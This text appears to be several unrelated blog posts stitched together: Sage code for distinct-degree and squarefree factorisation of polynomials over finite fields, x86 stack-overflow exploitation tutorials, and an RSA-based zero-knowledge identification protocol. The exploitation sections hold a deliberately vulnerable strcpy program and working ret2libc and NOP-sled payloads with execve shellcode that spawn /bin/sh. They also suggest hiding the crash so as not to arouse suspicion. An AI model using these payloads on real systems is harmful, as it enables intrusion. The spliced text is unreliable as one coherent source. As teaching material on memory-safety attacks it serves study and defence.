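for x in range(2, 20):
    assert (x**(p**n) - x) % (x**(p**d) - x) == 0
```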

So, given a polynomial $A$, which we can assume squarefree, we know that the factors of $A$ of degree $d$ are precisely those which are also factors of $X^{p^d}-X$, but not of $X^{p^e}-X$ for any $e < d$. This leads to the following algorithm (again, discarding unit factors):

def ddfact(A):
    p = A.base_ring().characteristic()
    x = A.variables()[0]
    factors = []
    P = x^p
    d = 1
    while A.degree() > 0:
        T = gcd(P-x, A)
        if T != 1:
            factors.append((T, d))
            A = A//T
        d = d+1
        P = P^p
    return factors

which works as expected:

sage: f = (x+1)*(x+2)*(x^2+x+1)*(x^2+x+2)
sage: ddfact(f)
[(x^2 + 3*x + 2, 1), (x^4 + 2*x^3 + 4*x^2 + 3*x + 2, 2)]
sage: (x+1)*(x+2)
x^2 + 3*x + 2
sage: (x^2+x+1)*(x^2+x+2)
x^4 + 2*x^3 + 4*x^2 + 3*x + 2

This works, but it is also very slow. For example on a polynomial of degree $20$:

sage: f = x^20 + 3*x^19 + 4*x^18 + 4*x^17 + x^16 + 3*x^15 + 2*x^14 + 2*x^13 + 3*x^12 + x^11 + 2*x^10 + 2*x^7 + 4*x^6 + 2*x^5 + 3*x^4 + 3*x^3 + x^2 + x + 2
sage: is_squarefree(f)
True
sage: t = cputime()
sage: ddfact(f)
[(x^2 + 2*x + 3, 2), (x^4 + 4*x^2 + 2, 4), (x^6 + 3*x^5 + 4*x^4 + 4*x^2 + x + 1, 6), (x^8 + 3*x^7 + 2*x^6 + x^5 + x^4 + 2*x^2 + x + 2, 8)]
sage: cputime(t)
1.932749000000058

it takes almost 2 seconds just for the distinct degree factorisation. For comparison, Sage’s factor() function on the same polynomial takes less than a tenth of a second for the complete factorisation:

sage: t = cputime()
sage: factor(f)
(x^2 + 2*x + 3) * (x^4 + 4*x^2 + 2) * (x^6 + 3*x^5 + 4*x^4 + 4*x^2 + x + 1) * (x^8 + 3*x^7 + 2*x^6 + x^5 + x^4 + 2*x^2 + x + 2)
sage: cputime(t)
0.02367099999992206

It is not difficult to identify the bottleneck: in order to compute the product of the irreducible factors of degree $d$, we take the GCD of $A$ and $X^{p^d}-X$. This means that we need to manipulate a polynomial ($X^{p^d}-X$) whose degree grows exponentially in $d$. In the previous example, the largest factor has degree $8$, which means $X^{p^d}-X$ will have degree $5^8 \approx 400,000$. This is clearly unacceptable.

It is also very simple to fix this problem. We are not really interested in $X^{p^d}-X$ itself, only in its common factors with $A$. It is easy to see that if $P$ is a common factor of $X^{p^d}-X$ and $A$, it will also be a factor of $X^{p^d}-X \mod A$ (the remainder of $X^{p^d}-X$ when divided by $A$), and conversely. In other words, we use the well-known result that $\gcd(A,B) = \gcd(A,B\mod A)$. The algorithm becomes

def ddfact(A):
    p = A.base_ring().characteristic()
    x = A.variables()[0]
    factors = []
    P = x^p
    d = 1
    while A.degree() > 0:
        T = gcd(P-x, A)
        if T != 1:
            factors.append((T, d))
            A = A//T
        d = d+1
        P = P^p % A
    return factors

which is much better:

sage: t = cputime()
sage: ddfact(f)
[(x^2 + 2*x + 3, 2), (x^4 + 4*x^2 + 2, 4), (x^6 + 3*x^5 + 4*x^4 + 4*x^2 + x + 1, 6), (x^8 + 3*x^7 + 2*x^6 + x^5 + x^4 + 2*x^2 + x + 2, 8)]
sage: cputime(t)
0.031130999999959386
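As a final aside, the integer analogue of the same trick makes the point nicely: to take a gcd with a huge power, it is enough to reduce the power modulo $A$ first (plain Python; the modulus below is an arbitrary choice of ours):

```python
import math

A = 10_403     # arbitrary modulus (= 101 * 103), for illustration only
e = 5 ** 8     # a big exponent, as in the example above

huge = 2 ** e - 2                 # about 390,000 bits
small = (pow(2, e, A) - 2) % A    # same residue modulo A, computed cheaply

assert huge % A == small
assert math.gcd(A, huge) == math.gcd(A, small)
```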

We wish to factor a polynomial $A$ with coefficients in the finite field $\mathbf{F}_p$ where $p$ is prime. As we stated in the previous post, the first step is to obtain a *squarefree factorisation* of $A$. Namely, we wish to obtain polynomials $A_1,A_2,\dots,A_k$, which are all squarefree and relatively prime, and such that $A = A_1A_2^2\dots A_k^k$. Ultimately, $A_i$ will be precisely the product of all the irreducible factors of $A$ with exponent $i$, which will ensure that all the above conditions are satisfied. We first need some preliminary results.

It is well-known from calculus that the derivative of $X^n$ is $nX^{n-1}$, and that the derivative is linear with respect to addition of functions and multiplication by a scalar. This allows us to define the derivative of the polynomial $A = \sum_{i=0}^n a_iX^i$ as $A’ = \sum_{i=1}^n ia_iX^{i-1}$. In calculus, the derivative was defined using limits, distances and suchlike. We cannot use this definition when working over a finite field, because we cannot define the distance between two elements in a sensible way. However, the final expression of the derivative of a polynomial still makes sense over a finite field (or any ring, for that matter), since it involves only the basic ring operations of addition and multiplication.

So we just define the derivative of a polynomial with coefficients in $\mathbf{F}_p$ as in the expression above. Our derivative still has the familiar properties:

**Linearity:** for all $f,g \in \mathbf{F}_p[X]$ and $a \in \mathbf{F}_p$, we have $(f+g)’ = f’+g’$ and $(af)’ = af’$.

**Product rule:** for all $f,g \in \mathbf{F}_p[X]$, we have $(fg)’ = f’g + fg’$. This formula generalises by induction to any number of factors:

\[ \left( \prod_i f_i \right)’ = \sum_i \left( f_i’ \prod_{j \ne i} f_j \right). \]

**Power rule:** for all $f \in \mathbf{F}_p[X]$ and integers $n > 0$, we have $(f^n)’ = nf’f^{n-1}$.
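As a quick sanity check of the definition in plain Python (the helper deriv is ours): over $\mathbf{F}_5$, the derivative of $X^3 + 2X + 1$ is $3X^2 + 2$.

```python
p = 5

def deriv(coeffs):
    """Formal derivative over F_p; coefficients listed from degree 0 up."""
    return [(i * c) % p for i, c in enumerate(coeffs)][1:]

# f = X^3 + 2X + 1 over F_5, so f' = 3X^2 + 2.
f = [1, 2, 0, 1]
assert deriv(f) == [2, 0, 3]
```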

To better grasp the idea of the squarefree factorisation algorithm, it is worthwhile to first consider the simpler case of a ring of characteristic $0$, such as $\mathbf{Z}$. The key is to consider the GCD of $A$ and $A’$. The reader might be aware from study of polynomials over $\mathbf{R}$ that in that case, a factor $P$ of $A$ is also a factor of $A’$ if and only if its exponent (in the decomposition of $A$) is more than $1$. This remains true in general over any ring of characteristic $0$.

More precisely, if $A = \prod P_i^{e_i}$, then $A’ = Q\prod P_i^{e_i-1}$, where none of the $P_i$ divide $Q$. We thus obtain that $T = \gcd(A,A’) = \prod P_i^{e_i-1}$; in other words, $T$ is the polynomial whose decomposition is the same as that of $A$, but with all exponents decreased by $1$. In particular, all the factors of $A$ which had exponent $1$ have disappeared and are not factors of $T$. This means that we know how to obtain the factors of exponent $1$ (which constitute $A_1$ in our squarefree factorisation): we must “isolate” all the factors which are in $A$ but not in $T$.

We thus compute $V = A/T = \prod P_i$, which is the product of all factors of $A$, but each with exponent $1$, and $V_2 = \gcd(T,V)$, which is the product of all factors of $A$ which are also in $T$ (*i.e.*, which have exponent more than $1$ in $A$). Since we want the factors which are *not* in $T$, we obtain finally $A_1 = V/V_2$. If we then let $T_2 = T/V_2$, this is the polynomial whose decomposition is the same as $A$, but with all exponents decreased by $2$, and so $A_2$ is the product of factors which are in $T$ but not in $T_2$. Continuing this process until $V_k$ is constant (which means all the factors have been accounted for), we obtain the following algorithm (in Sage):

```
def sqfreefactz(A):
    factors = []
    T = gcd(A, A.derivative())
    k = 1
    Tk = T
    Vk = A//T
    while Vk.degree() > 0:
        Vkplus1 = gcd(Tk, Vk)
        Tkplus1 = Tk//Vkplus1
        factors.append((Vk//Vkplus1, k))
        k = k+1
        Vk = Vkplus1
        Tk = Tkplus1
    return factors
```

which works as expected:

```
sage: R.<x> = PolynomialRing(ZZ)
sage: sqfreefactz( (x+1) * (x+2)^3 * (x+3)^3 * (x+4)^4 * (x+10)^10 )
[(x + 1, 1), (1, 2), (x^2 + 5*x + 6, 3), (x + 4, 4), (1, 5), (1, 6), (1, 7), (1, 8), (1, 9), (x + 10, 10)]
```

It does not handle non-monic polynomials:

```
sage: sqfreefactz( 100*(x+1) * (x+2)^3 * (x+3)^3 * (x+4)^4 * (x+10)^10 )
[(x + 1, 1), (1, 2), (x^2 + 5*x + 6, 3), (x + 4, 4), (1, 5), (1, 6), (1, 7), (1, 8), (1, 9), (x + 10, 10)]
```

but since we eventually want to work over a field, this is not a concern.

Over a finite field (or in general any field of non-zero characteristic), this algorithm does not work, as we can easily see:

```
sage: R.<x> = PolynomialRing(GF(5))
sage: sqfreefactz( (x+1)^5 )
[]
```

What went wrong? The previous algorithm was based on the fact that if $A = \prod P_i^{e_i}$, then $\gcd(A,A') = \prod P_i^{e_i-1}$. This is no longer true in non-zero characteristic: for example, with $A = (X+1)^5 \in \mathbf{F}_5[X]$ as above, we have $A' = 5(X+1)^4 = 0$ and so $\gcd(A,A') = A$ (and of course in the previous case we had $\gcd(A,A') \ne A$). So we must determine the correct expression for $\gcd(A,A')$, which in this case is more complicated.

We start from the squarefree factorisation $A = \prod A_i^i$, where the $A_i$ are all squarefree and relatively prime, and we have

\[ A' = \sum_i \left(\prod_{j \ne i} A_j^j\right) iA_i'A_i^{i-1}. \]

We want to obtain the factorisation of $T = \gcd(A,A')$. Let $P$ be an irreducible factor of $T$. Then $P$ is an irreducible factor of $A$, and so it is a factor of $A_m$ for some $m$ (note that $m$ is unique, since the $A_i$ are all relatively prime), and its exponent in the factorisation of $A$ is $m$.

To obtain its exponent in the factorisation of $A'$, we determine its exponent in each summand of the expression above. For every summand with $i \ne m$, there is a factor $A_m^m$, so the exponent of $P$ is at least $m$. For the summand $i=m$, $P$ divides none of the $A_j$ (since the $A_i$ are all relatively prime), and it does not divide $A_m'$ either (since $A_m$ is squarefree). Thus the exponent of $P$ in this summand is exactly its exponent in $mA_m^{m-1}$: it is $m-1$ if $p$ does not divide $m$ (meaning that $m \ne 0$ in $\mathbf{F}_p$), and otherwise the whole summand is $0$. This means that if $p$ does not divide $m$, then the exponent of $P$ in $A'$ is $m-1$ (the behavior in this case is identical to that in characteristic $0$), and otherwise the exponent of $P$ is at least $m$. In that latter case, since the exponent of $P$ in $A$ is $m$, its exponent in $T$ is $m$ also, and we obtain

\[ T = \prod_{p\nmid i}A_i^{i-1} \prod_{p|i}A_i^i. \]

This means that contrary to the previous case where the exponents of all factors were decreased by $1$, in this case only the factors whose exponent is *not* a multiple of $p$ have their exponents decreased, and the others are unchanged. We can see that when we try to run the previous algorithm, only the factors whose exponent is not a multiple of $p$ are accounted for:

```
sage: sqfreefactz( (x+2)^4 * (x+1)^5)
[(1, 1), (1, 2), (1, 3), (x + 2, 4)]
sage: sqfreefactz( (x+2)^4 * (x+1)^5 * (x+3)^7 * (x+4)^15)
[(1, 1), (1, 2), (1, 3), (x + 2, 4), (1, 5), (1, 6), (x + 3, 7)]
```
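We can also verify the expression for $\gcd(A,A')$ directly, outside of Sage. The following pure-Python sketch implements coefficient-list arithmetic and the Euclidean algorithm over $\mathbf{F}_5$, and checks that for $A = (X+1)^5(X+2)^2$ the exponent $5$ (a multiple of $p$) survives intact in the GCD, while the exponent $2$ drops to $1$:

```python
# Verifying T = gcd(A, A') over F_p (here p = 5), pure Python.
p = 5

def trim(a):
    while len(a) > 1 and a[-1] == 0:
        a = a[:-1]
    return a

def mul(a, b):
    res = [0] * (len(a) + len(b) - 1)
    for i, ai in enumerate(a):
        for j, bj in enumerate(b):
            res[i + j] = (res[i + j] + ai * bj) % p
    return trim(res)

def deriv(a):
    d = [(i * a[i]) % p for i in range(1, len(a))]
    return trim(d) if d else [0]

def pmod(a, b):
    # remainder of a divided by b over F_p (b must be nonzero)
    a = trim(a[:])
    inv = pow(b[-1], -1, p)
    while len(a) >= len(b) and a != [0]:
        q = (a[-1] * inv) % p
        s = len(a) - len(b)
        for i, bi in enumerate(b):
            a[s + i] = (a[s + i] - q * bi) % p
        a = trim(a)
    return a

def pgcd(a, b):
    while b != [0]:
        a, b = b, pmod(a, b)
    inv = pow(a[-1], -1, p)      # normalise to a monic polynomial
    return [(c * inv) % p for c in a]

def power(a, n):
    r = [1]
    for _ in range(n):
        r = mul(r, a)
    return r

A = mul(power([1, 1], 5), power([2, 1], 2))   # (X+1)^5 (X+2)^2
T = pgcd(A, deriv(A))
expected = mul(power([1, 1], 5), [2, 1])      # (X+1)^5 (X+2)
print(T == expected)   # True
```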

Since in this case the algorithm is more complicated, we describe it more formally. As above we construct two sequences of polynomials $(T_k)$ and $(V_k)$. We let $T_1 = T = \gcd(A,A')$, and $V_1 = A/T = \prod_{p\nmid i} A_i$. The subsequent terms are defined by induction as $V_{k+1} = \gcd(T_k,V_k)$ if $p\nmid k$, $V_{k+1} = V_k$ if $p|k$, and $T_{k+1} = T_k/V_{k+1}$. It is easily checked by induction that

\[ V_k = \prod_{i\ge k,\ p\nmid i} A_i, \]

and that

\[ T_k = \prod_{i>k,\ p\nmid i} A_i^{i-k} \prod_{p|i} A_i^i. \]

As before, we have $A_k = V_k/V_{k+1}$ if $p\nmid k$. How can we obtain the others? If we continue as above until $V_k$ becomes constant, in the end the left factor of $T_k$ becomes constant also, which means that we have $T_k = \prod_{p|i} A_i^i$. Since all the exponents in $T_k$ are multiples of $p$, we have $T_k = W^p$ for some $W$. It is then easy to recover $W$ (divide all exponents by $p$), and we can apply the algorithm recursively to obtain the squarefree factorisation of $W$. We then multiply the exponents back by $p$ to obtain the exponents in $A$, and this finally gives the following algorithm (with an added test to discard unit factors):

```
def sqfreefact(A, pmult=0):
    p = A.base_ring().characteristic()
    x = A.variables()[0]
    T = gcd(A, A.derivative())
    factors = []
    k = 1
    Tk = T
    Vk = A//T
    while Vk.degree() > 0:
        if k % p != 0:
            Vkplus1 = gcd(Tk, Vk)
            if Vk//Vkplus1 != 1:
                factors.append((Vk//Vkplus1, p^(pmult)*k))
        else:
            Vkplus1 = Vk
        Tkplus1 = Tk//Vkplus1
        k = k+1
        Vk = Vkplus1
        Tk = Tkplus1
    # Now Tk = W^p, so we recover W and continue (unless T is
    # actually constant).
    if Tk.degree() == 0:
        return factors
    newA = 0*x
    for i in range(Tk.degree()//p + 1):
        newA = newA + (Tk.coeffs()[p*i])*x^i
    return factors + sqfreefact(newA, pmult+1)
```

which works as expected:

```
sage: sqfreefact((x+2)^4 * x^4 * (x+1)^5 * (x+3)^7 * (x+4)^15)
[(x^2 + 2*x, 4), (x + 3, 7), (x + 1, 5), (x + 4, 15)]
```
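The $p$th-root step used in the recursion deserves a quick illustration. Since $a^p = a$ in $\mathbf{F}_p$ (Fermat), the Frobenius map gives $W(X)^p = W(X^p)$, so the coefficients of $W$ are exactly the coefficients of $T_k$ at the indices divisible by $p$. A pure-Python sketch of the same extraction that the loop over Tk.coeffs() performs above:

```python
# Recovering W from T = W^p over F_p: by Fermat a^p = a in F_p, so
# W(X)^p = W(X^p), and the coefficients of W are the coefficients
# of T at the indices divisible by p.
p = 5

def mul(a, b):
    res = [0] * (len(a) + len(b) - 1)
    for i, ai in enumerate(a):
        for j, bj in enumerate(b):
            res[i + j] = (res[i + j] + ai * bj) % p
    return res

def power(a, n):
    r = [1]
    for _ in range(n):
        r = mul(r, a)
    return r

def pth_root(t):
    # t is assumed to be a p-th power, so t[i] == 0 unless p | i
    return [t[p * i] for i in range((len(t) - 1) // p + 1)]

W = mul([1, 1], [3, 1])    # (X+1)(X+3) over F_5
T = power(W, p)            # T = W^5 = W(X^5)
print(pth_root(T) == W)    # True
```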

So far, our method of code execution has been to write a shellcode on the stack, and execute it from there. Since there is normally no reason why a program should need to execute anything on the stack, an obvious countermeasure was to make the stack non-executable. Indeed, if you omit the -z execstack compilation flag on the programs of the previous two posts, the attacks will fail with a segmentation fault. So executing code on the stack is no longer possible.

A new method, now referred to as return-to-libc (or ret2libc for short), was introduced by Solar Designer in 1997. As its name implies, instead of overwriting the return address of our vulnerable function with an address on the stack, we will overwrite it with the address of a *libc* function. The libc library contains all the standard functions such as printf() and exit(), so there is almost surely a function in it that does what we need.

Some reminders about the stack. Just after a function has returned, the stack looks like this:

```
|                |
+================+
|                |   old frame of the function
|                |   (no longer part of the stack)
|                |
+================+   the old return address is also no longer
| return address |   part of the stack
+----------------+
|                | <- esp (top of the stack)
|                |
|                |   frame of the caller
+----------------+
|    old ebp     | <- ebp
+================+
|                |
```

and on the other hand, just after a function has been called, the stack looks like this:

```
|                |
+================+
| return address | <- esp (top of the stack)
+----------------+
|   argument 1   |
+----------------+
|   argument 2   |
+----------------+   frame of the caller
|      ...       |
+----------------+
|   argument n   |
+----------------+
|   other data   |
|                |
|                | <- ebp
+================+
|                |
```

If we jump to a function, for example by putting its address as the return address of a vulnerable function, it will not know that it has not been called in the standard way, and will expect the stack to be in the usual form as above. This means that if we modify the return address of a function (say, foo()) with the address of another function (say, bar()), then just after foo() has returned, the two “views” of the stack above will coincide. Thus, we know how to pass parameters to bar(), and even how to set its return address to make it jump to a certain address after it has finished: after the return address of foo() (which is the address of bar()), we write the return address of bar(), and then its arguments.
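The layout described above can be sketched in Python for a 32-bit little-endian target. This is only an illustration: the 76-byte offset and the two addresses are placeholders matching the values used later in this post, and will differ on any other system.

```python
import struct

OFFSET = 76                 # bytes from buffer to the saved return address
SYSTEM_ADDR = 0xf7e5a430    # address of system() (placeholder value)
BINSH_ADDR  = 0xffffdfe8    # address of a "/bin/sh" string (placeholder)

payload  = b"1" * OFFSET                   # filler up to the return address
payload += struct.pack("<I", SYSTEM_ADDR)  # return address of foo(): bar()'s entry
payload += b"1" * 4                        # bar()'s return address (bogus here)
payload += struct.pack("<I", BINSH_ADDR)   # bar()'s first argument

print(len(payload))  # 88
```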

We will again be exploiting this program:

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

void vuln(char *s)
{
    char buffer[64];
    strcpy(buffer, s);
}

int main(int argc, char **argv)
{
    if (argc == 1) {
        fprintf(stderr, "Enter a string!\n");
        exit(EXIT_FAILURE);
    }
    vuln(argv[1]);
}
```

but this time we will not use -z execstack. As before, we need to write 76 bytes to buffer before reaching the return address. We will also disable ASLR, since it makes our lives much harder.

First, we need to obtain the address where the code of system() is located. This address will vary among systems, but (if ASLR is disabled) it will be constant on a given system until libc is recompiled. We can obtain it for example using a bogus program and gdb:

```
$ cat system.c
#include <stdlib.h>

int main(void)
{
    system("/bin/sh");
    return 0;
}
$ gcc -m32 -g -o system system.c
$ gdb ./system
Reading symbols from /home/.../system...done.
(gdb) start
Temporary breakpoint 1 at 0x80483ed: file system.c, line 5.
Starting program: /home/.../system

Temporary breakpoint 1, main () at system.c:5
5           system("/bin/sh");
(gdb) print system
$1 = {<text variable, no debug info>} 0xf7e5a430 <system>
```

So the address of system() is 0xf7e5a430; this is what we will write as our return address.

Then, system() takes as its argument a string containing the command we want to run, in our case /bin/sh. This is a bigger problem: how do we manage to obtain the address of a string /bin/sh? The easiest way, when ASLR is disabled, is through an environment variable. As we can see, environment variables are stored at the bottom of the stack (higher addresses), and they are also affected by ASLR:

```
$ cat useraddr.c
#include <stdio.h>
#include <stdlib.h>

int main(int argc, char **argv)
{
    char *p = getenv("USER");
    printf("USER is at %p\n", p);
    return 0;
}
$ gcc -m32 -o useraddr useraddr.c
$ echo 1 | sudo tee /proc/sys/kernel/randomize_va_space
1
$ ./useraddr
USER is at 0xffbb3f64
$ ./useraddr
USER is at 0xffcb2f64
$ echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
0
$ ./useraddr
USER is at 0xffffdf64
$ ./useraddr
USER is at 0xffffdf64
```

We see also that the address of a given environment variable does not change if the program is recompiled:

```
$ gcc -m32 -o useraddr useraddr.c
$ ./useraddr
USER is at 0xffffdf64
```

and that it also does not depend on the length of the program:

```
$ cat useraddr.c
#include <stdio.h>
#include <stdlib.h>

int plusone(int a)
{
    return a+1;
}

int add(int a, int b)
{
    int i;
    int res = a;
    for (i = 0; i<b; i++) {
        res = plusone(res);
    }
    return res;
}

int mult(int a, int b)
{
    int i;
    int res = 0;
    for (i = 0; i<b; i++) {
        res = add(res, a);
    }
    return res;
}

int main(int argc, char **argv)
{
    printf("3x2 = %d\n", mult(3, 2));
    char *p = getenv("USER");
    printf("USER is at %p\n", p);
    return 0;
}
$ gcc -m32 -o useraddr useraddr.c
$ ./useraddr
3x2 = 6
USER is at 0xffffdf64
```

It does however depend on the length of the *name* of the program:

```
$ cp useraddr useraddrrrrrrrrrrrrrrrrrrrrr
$ ./useraddrrrrrrrrrrrrrrrrrrrrr
3x2 = 6
USER is at 0xffffdf3c
$ cp useraddr 12345678
$ ./12345678
3x2 = 6
USER is at 0xffffdf64
```

Where does that leave us? We know that, as long as the names of two programs have the same length, a given environment variable will be at the same address in both programs. So, we first define a bogus environment variable to contain our string /bin/sh:

$ export BINSH="/bin/sh"

Next, our vulnerable program will be named vuln8, so we create a bogus program with a five-character name which prints the address of the environment variable BINSH:

```
$ cat binsh.c
#include <stdio.h>
#include <stdlib.h>

int main(void)
{
    char *p = getenv("BINSH");
    printf("BINSH is at %p\n", p);
    return 0;
}
$ gcc -m32 -o binsh binsh.c
$ ./binsh
BINSH is at 0xffffdfe8
```

We now have everything we need: the address of system() is 0xf7e5a430 and the address of its first argument is 0xffffdfe8. So we do

```
$ ./vuln8 $(perl -e 'print "1"x76 . "\x30\xa4\xe5\xf7" . "1"x4 . "\xe8\xdf\xff\xff"')
sh-4.2$ exit
zsh: segmentation fault  ./vuln8
$
```

We get a segmentation fault when we exit our shell (why?), but it works. The next paragraph will explain why we get a segfault and how to suppress it, so don’t read it now if you want to think about it.

Again, we name the caller (vulnerable) function foo(), and the called function (whose address we wrote over the return address of foo()), bar(). As we saw, the word immediately after the return address of foo() is the return address of bar(). In our case, it is thus the address where execution will jump when system() terminates (when we exit our shell). Since we put some bogus data there, the processor will jump to an invalid address, causing a segfault.

It might be desirable to avoid the segfault, perhaps so as not to arouse suspicion from a user; to do that, we need to write a valid address instead. What could we write? If all we wanted was to spawn a shell, we have already achieved that, so we have nothing more to do, and it seems appropriate to call exit() to terminate the program cleanly. We obtain the address of exit() in the same way we obtained the address of system():

```
$ cat exit.c
#include <stdlib.h>

int main(void)
{
    exit(0);
}
$ gcc -m32 -o exit exit.c
$ gdb ./exit
Reading symbols from /home/.../exit...(no debugging symbols found)...done.
(gdb) start
Temporary breakpoint 1 at 0x80483d7
Starting program: /home/.../exit

Temporary breakpoint 1, 0x080483d7 in main ()
(gdb) print exit
$1 = {<text variable, no debug info>} 0xf7e4dfb0 <exit>
(gdb)
```

so the address of exit() is 0xf7e4dfb0. We don’t really need to care about its arguments since it will exit the program no matter which argument we pass, and we obtain

```
$ ./vuln8 $(perl -e 'print "1"x76 . "\x30\xa4\xe5\xf7" . "\xb0\xdf\xe4\xf7" . "\xe8\xdf\xff\xff"')
sh-4.2$ exit
$
```

In the following program, the register eax no longer contains the address of buffer at the end of the execution of the function vuln():

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int vuln(char *s)
{
    char buffer[64];
    printf("buffer is at %p\n", buffer);
    strcpy(buffer, s);
    return 1;
}

int main(int argc, char **argv)
{
    if (argc == 1) {
        fprintf(stderr, "Enter a string!\n");
        exit(EXIT_FAILURE);
    }
    vuln(argv[1]);
}
```

Indeed, we see that it contains 1:

```
$ gcc -fno-stack-protector -z execstack -m32 -O0 -std=c99 -pedantic -Wall -Wextra -o vuln7 vuln7.c
$ objdump -d vuln7 | nl
[...]
   121  08048494 <vuln>:
   122   8048494:     55                      push   ebp
   123   8048495:     89 e5                   mov    ebp,esp
   124   8048497:     83 ec 58                sub    esp,0x58
   125   804849a:     b8 00 86 04 08          mov    eax,0x8048600
   126   804849f:     8d 55 b8                lea    edx,[ebp-0x48]
   127   80484a2:     89 54 24 04             mov    DWORD PTR [esp+0x4],edx
   128   80484a6:     89 04 24                mov    DWORD PTR [esp],eax
   129   80484a9:     e8 d2 fe ff ff          call   8048380 <printf@plt>
   130   80484ae:     8b 45 08                mov    eax,DWORD PTR [ebp+0x8]
   131   80484b1:     89 44 24 04             mov    DWORD PTR [esp+0x4],eax
   132   80484b5:     8d 45 b8                lea    eax,[ebp-0x48]
   133   80484b8:     89 04 24                mov    DWORD PTR [esp],eax
   134   80484bb:     e8 e0 fe ff ff          call   80483a0 <strcpy@plt>
   135   80484c0:     b8 01 00 00 00          mov    eax,0x1
   136   80484c5:     c9                      leave
   137   80484c6:     c3                      ret
[...]
```

which is the return value of the function (so if you were wondering how return values are passed, you now know that they are passed in eax). So we can’t use the technique of the previous post.

What can we do instead? The obvious answer of writing as return address the address of buffer is not realistic, because we generally have no way to know it exactly. For one thing, modern systems have a protection called ASLR (Address space layout randomisation), which makes it change to a random value on every run of the program, as we can see by running it a couple times:

```
$ ./vuln7 123
buffer is at 0xffda1ba0
$ ./vuln7 123
buffer is at 0xff8f26e0
$ ./vuln7 123
buffer is at 0xffd79d60
$ ./vuln7 123
buffer is at 0xff924620
```

But even without this protection (which we can also disable), the address will be different on different systems. This wouldn’t be so much of a problem if we didn’t need to know *exactly* the address to which we need to jump (as it stands, we need to jump exactly to the address of the first instruction of our shellcode; even one byte before or after will not work). In other words, we want to have some “wiggle room”: an area of memory, as large as possible, such that our attack will work if we jump anywhere into it. This is what NOP sleds do.

The idea of a NOP sled is very simple: we populate a large area of memory with bytes 0x90, which corresponds to the CPU instruction NOP, which does nothing. If we have a large area of NOPs, with our shellcode after it, we can jump anywhere into the area of NOPs, and the CPU will just “slide” to the end and execute the shellcode waiting there. Visually, it looks like this:

```
|                |
+================+
|                | <- esp
+----------------+
|     buffer     | <- ebp-72
|   (64 bytes)   |
|                |
+----------------+   frame of vuln()
|                |
+----------------+
|    old ebp     | <- ebp
+================+
| return address |
+----------------+
|      NOP       |
|                |
~                ~
|                |
+----------------+
|   shellcode    |
|                |
+----------------+
|                |
```

This is somewhat dirty, since we need to overwrite a large area of memory, and also unreliable because, since we choose our return address more or less blindly, it might not always fall inside the NOP sled (of course, the larger the sled, the higher the probability of success). But eventually, it will work (we use as return address an address of buffer from a previous run; it is very unlikely that we will get the same address again, but it is good enough):

```
$ for i in $(seq 1 10000); do echo $i; ./vuln7 $(perl -e 'print "1"x76 . "\xa0\x1b\xde\xff" . "\x90"x100000 . "\xeb\x18\x5e\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46\x0c\xb0\x0b\x8d\x1e\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68"'); done
[...]
52
buffer is at 0xffd8a4b0
sh-4.2$
```
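For reference, the same payload can be assembled in Python. In this sketch the guessed address 0xffde1ba0 is the buffer address seen on a previous run, and the shellcode is the 38-byte one from the previous posts:

```python
import struct

# A buffer address observed on a previous run; the real address
# changes between runs and systems, hence the retry loop above.
GUESS = 0xffde1ba0

# The 38-byte execve("/bin/sh") shellcode from the previous posts.
shellcode = (b"\xeb\x18\x5e\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46\x0c"
             b"\xb0\x0b\x8d\x1e\x8d\x4e\x08\x8d\x56\x0c\xcd\x80"
             b"\xe8\xe3\xff\xff\xff/bin/sh")

payload  = b"1" * 76                  # filler up to the saved return address
payload += struct.pack("<I", GUESS)   # overwrite it with our guess
payload += b"\x90" * 100000           # the NOP sled
payload += shellcode                  # slide down to here

print(len(payload))  # 100118
```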

The scenario is as follows: we first have a trusted authority, whom we will name Trent. Trent is trusted by everyone: what he says is true. Trent distributes to all interested parties a secret based on their identity, that he only can compute. Then, when Alice wants to identify to Bob, she uses a zero-knowledge protocol to demonstrate that she knows the secret associated to her identity, but without revealing it (so that Bob cannot subsequently impersonate her).

First, Trent chooses an RSA integer $n$ (product of two large, distinct primes $p,q$) and a public RSA exponent $e$ (an integer relatively prime to $\varphi(n) = (p-1)(q-1)$; we can assume that $e$ is a small prime, for example $e=3$ is perfectly fine). He then computes the associated private exponent $d$, and as usual publishes $n$ and $e$, keeping $p,q,d$ secret. We suppose that Alice’s identity (for example her name or her e-mail address) is somehow encoded as an element $I \in \mathbf{Z}_n^*$; Trent then gives her the value $B = I^{-d}$, which is Alice’s secret.

In order to identify to Bob, Alice wants to prove to him that she knows $B$, but without revealing it. They proceed as follows:

- Alice chooses at random an element $r \in \mathbf{Z}_n^*$, and computes $T = r^e$. She sends $T$ to Bob and keeps $r$ secret (this is RSA encryption).
- Bob chooses at random an element $c \in \{0,\dots,e-1\}$ (called the *challenge*) and sends it to Alice.
- Alice computes $t = rB^c$ and sends it to Bob.
- Bob accepts the identification if and only if $I^ct^e = T$.
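The whole round is easy to simulate. The following toy sketch in plain Python uses tiny illustrative parameters (far too small to be secure; the identity $I$ is an arbitrary value, and pow(x, -1, n) needs Python 3.8+):

```python
import math
import random

# Trent's setup, with toy parameters (p = 11, q = 17, e = 3).
p, q, e = 11, 17, 3
n, phi = p * q, (p - 1) * (q - 1)
assert math.gcd(e, phi) == 1
d = pow(e, -1, phi)              # private exponent, ed = 1 mod phi(n)

I = 42                           # Alice's encoded identity, a unit mod n
B = pow(pow(I, d, n), -1, n)     # her secret from Trent: B = I^(-d) mod n

# One round of identification:
r = random.randrange(1, n)
while math.gcd(r, n) != 1:       # r must be a unit mod n
    r = random.randrange(1, n)
T = pow(r, e, n)                 # Alice commits T = r^e
c = random.randrange(e)          # Bob's challenge
t = (r * pow(B, c, n)) % n       # Alice's response
print((pow(I, c, n) * pow(t, e, n)) % n == T)  # Bob's check: True
```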

This protocol has the three usual properties:

**Completeness:** If Alice really is Alice, then she can always make Bob accept her identification: she just needs to compute $t = rB^c$ as indicated by the protocol. Then

\[ \begin{align*}

I^ct^e

&= I^c(rB^c)^e \\

&= I^cr^eB^{ce} \\

&= I^cr^eI^{-dce} \\

&= I^cr^e(I^{de})^{-c} \\

&= I^cr^eI^{-c} \\

&= r^e \\

&= T,

\end{align*} \]

so Bob will accept.

